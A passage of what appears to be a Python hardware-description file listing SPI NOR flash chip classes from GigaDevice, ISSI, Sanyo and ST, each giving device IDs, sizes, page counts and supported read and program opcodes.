page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q64C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4017
name = "gd25q64c"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4014
name = "gd25q80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25Q80B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4014
name = "gd25q80b"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25T80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x3114
name = "gd25t80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class GD25VQ16C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4215
name = "gd25vq16c"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25VQ21B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4212
name = "gd25vq21b"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25VQ41B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4213
name = "gd25vq41b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25VQ80C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x4214
name = "gd25vq80c"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class GD25WQ80E(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.GIGADEVICE
device_id = 0x6514
name = "gd25wq80e"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25CD512(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0020
name = "is25cd512"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class IS25LP016D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6015
name = "is25lp016d"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25LP032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6016
name = "is25lp032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class IS25LP064(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6017
name = "is25lp064"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class IS25LP080D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6014
name = "is25lp080d"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25LP128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6018
name = "is25lp128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_2,
]
dummy_bits = 8
class IS25LP128D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6018
name = "is25lp128d"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25LP256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6019
name = "is25lp256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class IS25LP256D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x6019
name = "is25lp256d"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25LP512M(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x601a
name = "is25lp512m"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25LQ040B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x4013
name = "is25lq040b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP032(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7016
name = "is25wp032"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP064(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7017
name = "is25wp064"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7018
name = "is25wp128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class IS25WP128D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7018
name = "is25wp128d"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25WP256(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7019
name = "is25wp256"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
SpiNorFlashOpCodes.READ_1_1_1_4B,
SpiNorFlashOpCodes.PP_1_1_1_4B,
SpiNorFlashOpCodes.READ_1_1_1_FAST_4B,
SpiNorFlashOpCodes.READ_1_1_2_4B,
SpiNorFlashOpCodes.READ_1_1_4_4B,
SpiNorFlashOpCodes.PP_1_1_4_4B,
]
dummy_bits = 8
class IS25WP256D(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x7019
name = "is25wp256d"
total_size = 33554432 # bytes
page_size = 256 # bytes
total_pages = 131072
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class IS25WP512M(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ISSI
device_id = 0x701a
name = "is25wp512m"
total_size = 67108864 # bytes
page_size = 256 # bytes
total_pages = 262144
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_2,
SpiNorFlashOpCodes.PP_1_1_2,
SpiNorFlashOpCodes.READ_1_1_4,
SpiNorFlashOpCodes.PP_1_1_4,
]
dummy_bits = 8
class LE25FU106B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x001d
name = "le25fu106b"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU206(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0044
name = "le25fu206"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU206A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0612
name = "le25fu206a"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU406B(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x001e
name = "le25fu406b"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FU406C(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0613
name = "le25fu406c"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW106(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0015
name = "le25fw106"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW203A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x1600
name = "le25fw203a"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW403A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x1100
name = "le25fw403a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW406A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x001a
name = "le25fw406a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW418A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0010
name = "le25fw418a"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW806(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0026
name = "le25fw806"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25FW808(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0020
name = "le25fw808"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class LE25U40CMC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.SANYO
device_id = 0x0613
name = "le25u40cmc"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25P05(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2010
name = "m25p05"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P05_A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2010
name = "m25p05-a"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25P05_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p05-nonjedec"
total_size = 65536 # bytes
page_size = 256 # bytes
total_pages = 256
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P10(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2011
name = "m25p10"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P10_A(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2011
name = "m25p10-a"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25P10_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p10-nonjedec"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P128(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2018
name = "m25p128"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P128_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p128-nonjedec"
total_size = 16777216 # bytes
page_size = 256 # bytes
total_pages = 65536
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2015
name = "m25p16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P16_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p16-nonjedec"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P20(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2012
name = "m25p20"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P20_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p20-nonjedec"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P20_OLD(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x0011
name = "m25p20-old"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25P32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2016
name = "m25p32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P32_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p32-nonjedec"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2013
name = "m25p40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P40_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p40-nonjedec"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P40_OLD(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x0012
name = "m25p40-old"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25P64(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2017
name = "m25p64"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P64_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p64-nonjedec"
total_size = 8388608 # bytes
page_size = 256 # bytes
total_pages = 32768
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x2014
name = "m25p80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25P80_NONJEDEC(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.NONJEDEC
device_id = 0x0000
name = "m25p80-nonjedec"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PE10(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x8011
name = "m25pe10"
total_size = 131072 # bytes
page_size = 256 # bytes
total_pages = 512
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25PE16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x8015
name = "m25pe16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PE20(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x8012
name = "m25pe20"
total_size = 262144 # bytes
page_size = 256 # bytes
total_pages = 1024
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PE40(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x8013
name = "m25pe40"
total_size = 524288 # bytes
page_size = 256 # bytes
total_pages = 2048
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
]
dummy_bits = 8
class M25PE80(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x8014
name = "m25pe80"
total_size = 1048576 # bytes
page_size = 256 # bytes
total_pages = 4096
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PX16(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7115
name = "m25px16"
total_size = 2097152 # bytes
page_size = 256 # bytes
total_pages = 8192
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PX32(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7116
name = "m25px32"
total_size = 4194304 # bytes
page_size = 256 # bytes
total_pages = 16384
supported_opcodes = [
SpiNorFlashOpCodes.READ_1_1_1,
SpiNorFlashOpCodes.PP_1_1_1,
SpiNorFlashOpCodes.READ_1_1_1_FAST,
]
dummy_bits = 8
class M25PX32_S0(SpiNorFlashModule):
manufacturer_id = SpiNorFlashManufacturerIDs.ST
device_id = 0x7316
name = "m25px32-s0"
